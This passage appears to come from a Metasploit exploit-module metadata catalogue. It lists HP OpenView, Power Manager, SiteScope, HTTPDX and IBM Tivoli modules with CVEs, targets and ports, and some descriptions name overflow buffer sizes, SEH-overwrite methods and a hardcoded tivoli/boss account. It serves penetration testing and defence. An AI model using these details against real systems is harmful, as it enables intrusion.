"exploit_windows/http/hp_nnm_ovwebhelp": {
"name": "HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_ovwebhelp",
"rank": 500,
"disclosure_date": "2009-12-09",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n By sending a specially crafted CGI request to OvWebHelp.exe, an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2009-4178",
"OSVDB-60929",
"BID-37340"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP OpenView Network Node Manager 7.50"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_ovwebhelp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_ovwebsnmpsrv_main": {
"name": "HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_ovwebsnmpsrv_main",
"rank": 500,
"disclosure_date": "2010-06-16",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n\n This vulnerability is triggerable via either a GET or POST request. The buffer being\n written to is 1024 bytes in size. It is important to note that this vulnerability must\n be exploited by overwriting SEH. Otherwise, CVE-2010-1961 is triggered!\n\n The vulnerable code is within the \"main\" function within \"ovwebsnmpsrv.exe\" with a\n timestamp prior to April 7th, 2010. There are no stack cookies, so exploitation is\n easily achieved by overwriting SEH structures.\n\n There exists some unreliability when running this exploit. It is not completely clear why\n at this time, but may be related to OVWDB or session management. Also, on some attempts\n OV NNM may report invalid characters in the URL. It is not clear what is causing this\n either.",
"references": [
"CVE-2010-1964",
"OSVDB-65552",
"BID-40873",
"ZDI-10-108"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP OpenView Network Node Manager 7.53 w/NNM_01201",
"HP OpenView Network Node Manager 7.53 (Windows 2003)",
"Debug Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_ovwebsnmpsrv_main",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_ovwebsnmpsrv_ovutil": {
"name": "HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_ovwebsnmpsrv_ovutil",
"rank": 500,
"disclosure_date": "2010-06-16",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n\n This vulnerability is triggerable via either a GET or POST request. It is interesting to\n note that this vulnerability cannot be exploited by overwriting SEH, since attempting\n to would trigger CVE-2010-1964.\n\n The vulnerable code is within a sub-function called from \"main\" within \"ovwebsnmpsrv.exe\"\n with a timestamp prior to April 7th, 2010. This function contains a 256 byte stack buffer\n which is passed to the \"getProxiedStorageAddress\" function within ovutil.dll. When\n processing the address results in an error, the buffer is overflowed in a call to sprintf_new.\n There are no stack cookies present, so exploitation is easily achieved by overwriting the\n saved return address.\n\n There exists some unreliability when running this exploit. It is not completely clear why\n at this time, but may be related to OVWDB or session management. Also, on some attempts\n OV NNM may report invalid characters in the URL. It is not clear what is causing this\n either.",
"references": [
"CVE-2010-1961",
"OSVDB-65428",
"BID-40638",
"ZDI-10-106",
"URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP OpenView Network Node Manager 7.53 w/NNM_01201",
"HP OpenView Network Node Manager 7.53 (Windows 2003)",
"Debug Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_ovwebsnmpsrv_ovutil",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_ovwebsnmpsrv_uro": {
"name": "HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_ovwebsnmpsrv_uro",
"rank": 500,
"disclosure_date": "2010-06-08",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n The vulnerable code is within the option parsing function within \"ovwebsnmpsrv.exe\" with a\n timestamp prior to April 7th, 2010.\n\n Reaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined\n with some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is\n important to note that this vulnerability must be exploited by overwriting SEH. This is since\n overflowing the buffer with controllable data always triggers an access violation when\n attempting to write static text beyond the end of the stack.\n\n Exploiting this issue is a bit tricky due to a restrictive character set. In order to accomplish\n arbitrary code execution, a double-backward jump is used in combination with the Alpha2\n encoder.",
"references": [
"CVE-2010-1960",
"OSVDB-65427",
"BID-40637",
"ZDI-10-105"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP OpenView Network Node Manager 7.53 w/NNM_01206",
"Debug Target"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_ovwebsnmpsrv_uro",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_snmp": {
"name": "HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_snmp",
"rank": 500,
"disclosure_date": "2009-12-09",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n By sending a specially crafted CGI request to Snmp.exe, an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2009-3849",
"OSVDB-60933"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP OpenView Network Node Manager 7.50 / Windows 2000 All"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_snmp.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_snmp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_snmpviewer_actapp": {
"name": "HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_snmpviewer_actapp",
"rank": 500,
"disclosure_date": "2010-05-11",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. By making a specially crafted HTTP request to the \"snmpviewer.exe\"\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary\n code.\n\n The vulnerable code lies within a function within \"snmpviewer.exe\" with a\n timestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET\n or POST request. The request must contain 'act' and 'app' parameters which, when\n combined, total more than the 1024 byte stack buffer can hold.\n\n It is important to note that this vulnerability must be exploited by overwriting SEH.\n While the saved return address can be smashed, a function call that occurs before\n the function returns calls \"exit\".",
"references": [
"CVE-2010-1552",
"OSVDB-64975",
"BID-40068",
"ZDI-10-083",
"URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP OpenView Network Node Manager 7.53 w/NNM_01201",
"HP OpenView Network Node Manager 7.53 (Windows 2003)",
"Debug Target"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_snmpviewer_actapp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_toolbar_01": {
"name": "HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_toolbar_01",
"rank": 500,
"disclosure_date": "2009-01-07",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2008-0067",
"OSVDB-53222",
"BID-33147"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP OpenView Network Node Manager 7.50 / Windows 2000 All"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_toolbar_01.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_toolbar_01",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_toolbar_02": {
"name": "HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_toolbar_02",
"rank": 300,
"disclosure_date": "2009-01-21",
"type": "exploit",
"author": [
"Oren Isacson",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.0\n and 7.53. By sending a CGI request with a specially crafted OvOSLocale cookie to Toolbar.exe, an\n attacker may be able to execute arbitrary code. Please note that this module only works\n against a specific build (i.e. NNM 7.53_01195).",
"references": [
"CVE-2009-0920",
"OSVDB-53242",
"BID-34294",
"URL-http://www.coresecurity.com/content/openview-buffer-overflows"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"HP OpenView Network Node Manager Release B.07.00",
"HP OpenView Network Node Manager 7.53 Patch 01195"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_toolbar_02.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_toolbar_02",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_webappmon_execvp": {
"name": "HP OpenView Network Node Manager execvp_nc Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_webappmon_execvp",
"rank": 500,
"disclosure_date": "2010-07-20",
"type": "exploit",
"author": [
"Shahin Ramezany <shahin@abysssec.com>",
"sinn3r <sinn3r@metasploit.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01207 or NNM_01206 without the SSRT100025 hotfix. By specifying a long 'sel'\n parameter when calling methods within the 'webappmon.exe' CGI program, an attacker can\n cause a stack-based buffer overflow and execute arbitrary code.\n\n This vulnerability is not triggerable via a GET request due to limitations on the\n request size. The buffer being targeted is 16384 bytes in size. There are actually two\n adjacent buffers that both get overflowed (one into the other), and strcat is used.\n\n The vulnerable code is within the \"execvp_nc\" function within \"ov.dll\" prior to\n v 1.30.12.69. There are no stack cookies, so exploitation is easily achieved by\n overwriting the saved return address or SEH frame.\n\n This vulnerability might also be triggerable via other CGI programs, however this was\n not fully investigated.",
"references": [
"CVE-2010-2703",
"OSVDB-66514",
"BID-41829",
"ZDI-10-137",
"URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02286088"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"HP OpenView Network Node Manager 7.53 w/NNM_01206",
"HP OpenView Network Node Manager 7.53 (Windows 2003)",
"Debug Target"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_webappmon_execvp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_webappmon_ovjavalocale": {
"name": "HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_webappmon_ovjavalocale",
"rank": 500,
"disclosure_date": "2010-08-03",
"type": "exploit",
"author": [
"Nahuel Riva",
"sinn3r <sinn3r@metasploit.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53.\n By sending a request containing a cookie longer than 5120 bytes, an attacker can overflow\n a stack buffer and execute arbitrary code.\n\n The vulnerable code is within the OvWwwDebug function. The static-sized stack buffer is\n declared within this function. When the vulnerability is triggered, the stack trace looks\n like the following:\n\n #0 ...\n #1 sprintf_new(local_stack_buf, fmt, cookie);\n #2 OvWwwDebug(\" HTTP_COOKIE=%s\\n\", cookie);\n #3 ?OvWwwInit@@YAXAAHQAPADPBD@Z(x, x, x);\n #4 sub_405ee0(\"nnm\", \"webappmon\");\n\n No validation is done on the cookie argument. There are no stack cookies, so exploitation\n is easily achieved by overwriting the saved return address or SEH frame.\n\n The original advisory detailed an attack vector using the \"OvJavaLocale\" cookie being\n passed in a request to \"webappmon.exe\". Further research shows that several different\n cookie values, as well as several different CGI applications, can be used.",
"references": [
"CVE-2010-2709",
"OSVDB-66932",
"BID-42154",
"URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02446520",
"URL-http://www.coresecurity.com/content/hp-nnm-ovjavalocale-buffer-overflow"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"HP OpenView Network Node Manager 7.53",
"HP OpenView Network Node Manager 7.53 (Windows 2003)",
"Debug Target"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_webappmon_ovjavalocale",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_openview_insight_backdoor": {
"name": "HP OpenView Performance Insight Server Backdoor Account Code Execution",
"full_name": "exploit/windows/http/hp_openview_insight_backdoor",
"rank": 600,
"disclosure_date": "2011-01-31",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a hidden account in the com.trinagy.security.XMLUserManager Java\n class. When using this account, an attacker can abuse the\n com.trinagy.servlet.HelpManagerServlet class and write arbitrary files to the system\n allowing the execution of arbitrary code.\n\n NOTE: This module has only been tested against HP OpenView Performance Insight Server 5.41.0",
"references": [
"CVE-2011-0276",
"OSVDB-70754"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Universal Windows Target"
],
"mod_time": "2018-08-20 16:05:58 +0000",
"path": "/modules/exploits/windows/http/hp_openview_insight_backdoor.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_openview_insight_backdoor",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/http/hp_pcm_snac_update_certificates": {
"name": "HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload",
"full_name": "exploit/windows/http/hp_pcm_snac_update_certificates",
"rank": 600,
"disclosure_date": "2013-09-09",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The\n vulnerability in the UpdateCertificatesServlet allows an attacker to upload arbitrary\n files, taking into account that binary writes aren't allowed. Additionally, authentication\n can be bypassed in order to upload the file. This module has been tested successfully on\n the SNAC server installed with HP ProCurve Manager 4.0.",
"references": [
"CVE-2013-4812",
"OSVDB-97155",
"BID-62348",
"ZDI-13-225"
],
"platform": "Windows",
"arch": "java",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP ProCurve Manager 4.0 SNAC Server"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_pcm_snac_update_certificates",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_pcm_snac_update_domain": {
"name": "HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload",
"full_name": "exploit/windows/http/hp_pcm_snac_update_domain",
"rank": 600,
"disclosure_date": "2013-09-09",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The\n vulnerability in the UpdateDomainControllerServlet allows an attacker to upload arbitrary\n files, taking into account that binary writes aren't allowed. Additionally, authentication\n can be bypassed in order to upload the file. This module has been tested successfully on\n the SNAC server installed with HP ProCurve Manager 4.0.",
"references": [
"CVE-2013-4811",
"OSVDB-97154",
"BID-62349",
"ZDI-13-226"
],
"platform": "Windows",
"arch": "java",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP ProCurve Manager 4.0 SNAC Server"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_pcm_snac_update_domain",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_power_manager_filename": {
"name": "HP Power Manager 'formExportDataLogs' Buffer Overflow",
"full_name": "exploit/windows/http/hp_power_manager_filename",
"rank": 300,
"disclosure_date": "2011-10-19",
"type": "exploit",
"author": [
"Alin Rad Pop",
"Rodrigo Escobar <ipax@dclabs.com.br>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a buffer overflow in HP Power Manager's 'formExportDataLogs'.\n By creating a malformed request specifically for the fileName parameter, a stack-based\n buffer overflow occurs due to a long error message (which contains the fileName),\n which may result in arbitrary remote code execution under the context of 'SYSTEM'.",
"references": [
"CVE-2009-3999",
"OSVDB-61848",
"BID-37867"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows XP SP3 / Win Server 2003 SP0"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/hp_power_manager_filename.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_power_manager_filename",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_power_manager_login": {
"name": "Hewlett-Packard Power Manager Administration Buffer Overflow",
"full_name": "exploit/windows/http/hp_power_manager_login",
"rank": 200,
"disclosure_date": "2009-11-04",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Hewlett-Packard Power Manager 4.2.\n Sending a specially crafted POST request with an overly long Login string, an\n attacker may be able to execute arbitrary code.",
"references": [
"CVE-2009-2685",
"OSVDB-59684"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows 2000 SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_power_manager_login.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_power_manager_login",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_sitescope_dns_tool": {
"name": "HP SiteScope DNS Tool Command Injection",
"full_name": "exploit/windows/http/hp_sitescope_dns_tool",
"rank": 400,
"disclosure_date": "2015-10-09",
"type": "exploit",
"author": [
"Kirk Hayes",
"Charles Riggs",
"Juan Vazquez"
],
"description": "This module exploits a command injection vulnerability\n discovered in HP SiteScope 11.30 and earlier versions (tested in 11.26\n and 11.30). The vulnerability exists in the DNS Tool allowing an\n attacker to execute arbitrary commands in the context of the service. By\n default, HP SiteScope installs and runs as SYSTEM in Windows and does\n not require authentication. This vulnerability only exists on the\n Windows version. The Linux version is unaffected.",
"references": [
"URL-https://community.rapid7.com/community/metasploit/blog/2015/10/09/r7-2015-17-hp-sitescope-dns-tool-command-injection",
"URL-http://www8.hp.com/us/en/software-solutions/sitescope-application-monitoring/index.html"
],
"platform": "Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP SiteScope 11.30 / Microsoft Windows 7 and higher",
"HP SiteScope 11.30 / CMD"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_sitescope_dns_tool.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_sitescope_dns_tool",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_sitescope_runomagentcommand": {
"name": "HP SiteScope Remote Code Execution",
"full_name": "exploit/windows/http/hp_sitescope_runomagentcommand",
"rank": 0,
"disclosure_date": "2013-07-29",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a code execution flaw in HP SiteScope.\n The vulnerability exists in the opcactivate.vbs script, which\n is reachable from the APIBSMIntegrationImpl AXIS service, and\n uses WScript.Shell.run() to execute cmd.exe with user provided\n data. Note that the opcactivate.vbs component is installed\n with the (optional) HP Operations Agent component. The module\n has been tested successfully on HP SiteScope 11.20 (with HP\n Operations Agent) over Windows 2003 SP2.",
"references": [
"CVE-2013-2367",
"OSVDB-95824",
"BID-61506",
"ZDI-13-205"
],
"platform": "Windows",
"arch": "x86",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP SiteScope 11.20 (with Operations Agent) / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_sitescope_runomagentcommand",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/httpdx_handlepeer": {
"name": "HTTPDX h_handlepeer() Function Buffer Overflow",
"full_name": "exploit/windows/http/httpdx_handlepeer",
"rank": 500,
"disclosure_date": "2009-10-08",
"type": "exploit",
"author": [
"Pankaj Kohli <pankaj208@gmail.com>",
"Trancer <mtrancer@gmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in HTTPDX HTTP server 1.4. The\n vulnerability is caused due to a boundary error within the \"h_handlepeer()\" function in http.cpp.\n By sending an overly long HTTP request, an attacker can overrun a buffer and execute arbitrary code.",
"references": [
"OSVDB-58714",
"CVE-2009-3711",
"URL-http://www.pank4j.com/exploits/httpdxb0f.php",
"URL-http://www.rec-sec.com/2009/10/16/httpdx-buffer-overflow-exploit/"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"httpdx 1.4 - Windows XP SP3 English",
"httpdx 1.4 - Windows 2003 SP2 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/httpdx_handlepeer.rb",
"is_install_path": true,
"ref_name": "windows/http/httpdx_handlepeer",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/httpdx_tolog_format": {
"name": "HTTPDX tolog() Function Format String Vulnerability",
"full_name": "exploit/windows/http/httpdx_tolog_format",
"rank": 500,
"disclosure_date": "2009-11-17",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a format string vulnerability in HTTPDX HTTP server.\n By sending a specially crafted HTTP request containing format specifiers, an\n attacker can corrupt memory and execute arbitrary code.\n\n By default logging is off for HTTP, but enabled for the 'moderator' user\n via FTP.",
"references": [
"CVE-2009-4769",
"OSVDB-60182"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting",
"httpdx 1.4 - Windows XP SP3 English",
"httpdx 1.4.5 - Windows XP SP3 English",
"httpdx 1.4.6 - Windows XP SP3 English",
"httpdx 1.4.6b - Windows XP SP3 English",
"httpdx 1.5 - Windows XP SP3 English",
"Debug target"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/httpdx_tolog_format.rb",
"is_install_path": true,
"ref_name": "windows/http/httpdx_tolog_format",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/ia_webmail": {
"name": "IA WebMail 3.x Buffer Overflow",
"full_name": "exploit/windows/http/ia_webmail",
"rank": 200,
"disclosure_date": "2003-11-03",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This exploits a stack buffer overflow in the IA WebMail server.\n This exploit has not been tested against a live system at\n this time.",
"references": [
"CVE-2003-1192",
"OSVDB-2757",
"BID-8965",
"URL-http://www.k-otik.net/exploits/11.19.iawebmail.pl.php"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"IA WebMail 3.x"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/ia_webmail.rb",
"is_install_path": true,
"ref_name": "windows/http/ia_webmail",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/ibm_tivoli_endpoint_bof": {
"name": "IBM Tivoli Endpoint Manager POST Query Buffer Overflow",
"full_name": "exploit/windows/http/ibm_tivoli_endpoint_bof",
"rank": 400,
"disclosure_date": "2011-05-31",
"type": "exploit",
"author": [
"bannedit <bannedit@metasploit.com>",
"Jeremy Brown <0xjbrown@gmail.com>"
],
"description": "This module exploits a stack-based buffer overflow in the way IBM Tivoli\n Endpoint Manager versions 3.7.1, 4.1, 4.1.1, 4.3.1 handle long POST query\n arguments.\n\n This issue can be triggered by sending a specially crafted HTTP POST request to\n the service (lcfd.exe) listening on TCP port 9495. To trigger this issue, authorization\n is required. This exploit makes use of a second vulnerability: a hardcoded account\n (tivoli/boss) is used to bypass the authorization restriction.",
"references": [
"CVE-2011-1220",
"OSVDB-72713",
"OSVDB-72751",
"BID-48049",
"ZDI-11-169"
],
"platform": "Windows",
"arch": "",
"rport": 9495,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Windows Server 2003 SP0",
"Windows Server 2003 SP1",
"Windows Server 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/ibm_tivoli_endpoint_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/ibm_tpmfosd_overflow": {
"name": "IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow",
"full_name": "exploit/windows/http/ibm_tpmfosd_overflow",
"rank": 400,
"disclosure_date": "2007-05-02",
"type": "exploit",
"author": [
"toto"
